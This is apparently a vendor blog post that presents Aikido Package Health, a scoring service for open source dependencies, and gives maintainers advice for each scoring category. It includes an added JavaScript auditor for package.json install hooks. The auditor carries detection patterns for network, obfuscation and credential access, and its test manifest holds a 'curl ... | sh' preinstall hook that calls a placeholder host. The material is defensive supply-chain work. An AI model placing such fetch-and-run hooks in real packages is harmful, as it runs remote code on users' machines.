TLDR
Aikido Package Health surfaces the true health of an open source package with a single score. It helps devs understand stability, maintenance quality, and supply-chain risk before installing a dependency.
Aikido Package Health is a public service that assigns a clear Health Score to open source packages. It gives you an honest signal about which dependencies are well-maintained and safe to adopt, and which ones might need extra scrutiny before you pull them into your project.
The goal is simple: give devs visibility into the long-term reliability of their dependencies, not just their vulnerability status, because maintenance patterns, stability, and hygiene matter just as much as CVEs.
This post walks through what makes a package healthy and what maintainers can do to improve their score.
Why Package Health matters
Choosing dependencies is fast, but understanding their long-term stability is not. Maintainers change, release patterns shift, dependency trees grow, and install scripts evolve quietly over time. These signals affect reliability, yet most teams never see them.
Package Health brings this information into one place. It looks at how a package’s dependency tree evolves, how stable its maintainers are, how predictable its releases have been, how safe its lifecycle scripts behave, and whether provenance data is available. These signals turn into a simple Health Score that helps devs make safer, faster decisions.
How Aikido calculates a Health Score
Each Health Score is built from measurable behaviour extracted from a package’s release and metadata history. We look at how the project changes over time, who maintains it, what scripts it runs during install, and whether its builds can be verified.
The score is composed of five weighted categories:
Dependencies
How stable the dependency tree is between versions.
Maintainer Stability
How consistent the release authors are and whether maintainership has shifted unexpectedly.
Maturity
How long the project has existed, how predictably it evolves, and whether releases follow a sensible cadence.
Supply-Chain Scripts
How safe the package’s lifecycle scripts are and whether they introduce unnecessary risk during installation.
Attestations
Whether the project includes verifiable provenance to prove that builds are authentic and reproducible.
These categories combine into a clear, at-a-glance signal of package health.
Keeping each category healthy
Maintainers can actively improve their Health Score through a few steady habits. The same principles help if you maintain internal libraries or evaluate external dependencies.
1. Keep your dependency tree lean
Add runtime dependencies only when they’re essential. Every new dependency adds transitive risk and maintenance overhead. Prefer small, well-audited modules or reuse existing ones already trusted in your ecosystem. If you add something new, document the reasoning and check its security track record.
2. Maintain continuity among maintainers
A consistent set of maintainers creates confidence. Plan handovers properly, keep a changelog that links releases to authors, and avoid long inactivity gaps. Stable authorship helps users and automated tools detect when a project is drifting or abandoned.
3. Publish steadily and respect version history
Regular releases, even small ones, show that the project is supported. Keep semantic versioning consistent. Avoid rewriting history. Tag releases clearly. A predictable cadence directly improves maturity and trust.
4. Review and harden lifecycle scripts
Install-time scripts are common sources of supply-chain issues. Remove scripts you don’t need. If you keep them, ensure they avoid network calls, privileged actions, or hidden behaviour during installation. Static analysis and scanning help catch risky patterns early.
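As an added example of the review step above (this is not Aikido's code or any part of the Package Health scoring; the hook list is npm's, while the risk patterns, thresholds and sample manifests are assumptions constructed for illustration), the following script reads a package.json, lists every lifecycle hook that npm would run automatically, and flags commands that show the behaviours item 4 warns about: network access, privileged actions, and encoded or dynamically evaluated code.

```javascript
// Added example, not Aikido's code: audit the lifecycle hooks in a package.json.
// Hook names are the ones npm runs automatically; the risk patterns are heuristics
// chosen for this illustration, not an exhaustive or official list.
'use strict';

const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepare', 'prepublish', 'prepublishOnly', 'prepack', 'postpack',
];

// Each pattern names one behaviour a reviewer would want explained before accepting it.
const RISK_PATTERNS = [
  { id: 'network',        re: /\b(curl|wget)\b|https?:\/\//i,          note: 'fetches content from the network at install time' },
  { id: 'remote_exec',    re: /\|\s*(sh|bash|node)\b/,                  note: 'pipes output into an interpreter' },
  { id: 'privilege',      re: /\b(sudo|chown)\b|\bchmod\s+\S*7/,        note: 'privileged or permission-changing action' },
  { id: 'obfuscation',    re: /\b(base64|atob|eval)\b|\\x[0-9a-f]{2}/i, note: 'encoded or dynamically evaluated code' },
  { id: 'credential_env', re: /\$\{?[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD)/, note: 'reads a credential-like environment variable' },
];

// Returns one finding per declared lifecycle hook: { hook, command, risks[] }.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const risks = RISK_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.id);
    findings.push({ hook, command, risks });
  }
  return findings;
}

// Collapses the findings into a single review outcome.
function verdict(findings) {
  if (findings.length === 0) return 'clean: no lifecycle scripts';
  const risky = findings.filter((f) => f.risks.length > 0);
  if (risky.length === 0) return `review: ${findings.length} lifecycle script(s), no risky patterns`;
  return `block: ${risky.length} of ${findings.length} lifecycle script(s) match risky patterns`;
}

// Entry point for raw package.json text (as read from disk or a registry tarball).
function auditPackageJsonText(text) {
  const findings = auditLifecycleScripts(JSON.parse(text));
  return { findings, verdict: verdict(findings) };
}

// Constructed sample manifests for the demonstration; these are not real packages.
const SAMPLE_CLEAN = JSON.stringify({
  name: 'tidy-lib', version: '1.2.0',
  scripts: { test: 'node test.js' },
});
const SAMPLE_RISKY = JSON.stringify({
  name: 'suspect-lib', version: '0.0.3',
  scripts: {
    preinstall: 'curl -s https://example.invalid/setup.sh | sh',
    postinstall: 'node scripts/build-native.js',
  },
});

// Usage: node audit-scripts.js [path/to/package.json]; falls back to the risky sample.
if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('fs');
  const text = process.argv[2] ? fs.readFileSync(process.argv[2], 'utf8') : SAMPLE_RISKY;
  const report = auditPackageJsonText(text);
  for (const f of report.findings) {
    console.log(`${f.hook}: ${f.command}  -> ${f.risks.length ? f.risks.join(', ') : 'ok'}`);
  }
  console.log(report.verdict);
}
```

Run against the risky sample, the preinstall hook is flagged for both network access and piping into an interpreter, while the postinstall build step is listed for review without a risk flag, and the manifest as a whole is marked for blocking. On the consuming side the same concern is addressed by installing with `npm install --ignore-scripts` and then deliberately enabling only the hooks you have reviewed.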
5. Use attestations to prove integrity
Automate provenance and SBOM attestations in CI. They provide cryptographic proof that builds are reproducible and untampered. Once added, monitor for regressions and fix missing attestations quickly to maintain a strong security posture.
By following these practices, packages naturally maintain higher scores and earn more trust from devs and security tools.
Helping maintainers build safer open source
Aikido’s Health Score highlights maintenance quality, not just known vulnerabilities. It acts as an early-warning system for ecosystem drift, showing when a project’s hygiene starts slipping long before it becomes security debt.
By giving maintainers clear feedback and helping devs make informed decisions, Aikido aims to strengthen the open source ecosystem and make it safer, more transparent, and more resilient for everyone relying on it.
Find the right package for your project → https://intel.aikido.dev/packages